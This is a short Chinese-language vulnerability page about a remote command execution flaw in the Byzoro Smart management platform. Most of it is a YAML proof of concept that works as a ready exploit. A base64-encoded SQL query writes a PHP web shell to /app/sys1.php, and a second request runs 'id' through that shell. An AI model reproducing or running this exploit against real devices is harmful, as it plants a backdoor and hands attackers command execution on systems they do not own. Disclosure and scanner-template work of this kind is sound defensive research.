byzoro-smart-importhtml-rce: 百卓 Smart importhtml.php 远程命令执行漏洞

日期: 2025-09-01 | 影响软件: byzoro-smart-importhtml | POC: 已公开

漏洞描述

百卓 importhtml.php文件sql语句无过滤,通过Sql语句可远程命令执行 title="Smart管理平台"

PoC代码[已公开]

id: byzoro-smart-importhtml-rce

info:
  name: 百卓 Smart importhtml.php 远程命令执行漏洞
  author: zan8in
  severity: critical
  verified: true
  description: |
    百卓 importhtml.php文件sql语句无过滤,通过Sql语句可远程命令执行
    title="Smart管理平台"
  reference:
    - http://wiki.peiqi.tech/wiki/iot/%E7%99%BE%E5%8D%93/%E7%99%BE%E5%8D%93%20Smart%20importhtml.php%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.html

rules:
  r0:
    request:
      method: GET
      path: /importhtml.php?type=exporthtmlmail&tab=tb_RCtrlLog&sql=c2VsZWN0IDB4M2MzZjcwNjg3MDIwNjU2MzY4NmYyMDczNzk3Mzc0NjU2ZDI4MjQ1ZjUwNGY1MzU0NWIyMjYzNmQ2NDIyNWQyOTNiM2YzZSBpbnRvIG91dGZpbGUgJy91c3IvaGRkb2NzL25zZy9hcHAvc3lzMS5waHAn
    expression: response.status == 200
  r1:
    request:
      method: POST
      path: /app/sys1.php
      body: |
        cmd=id
    expression: response.status == 200 && "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)".bmatches(response.body)
expression: r0() && r1()

相关漏洞推荐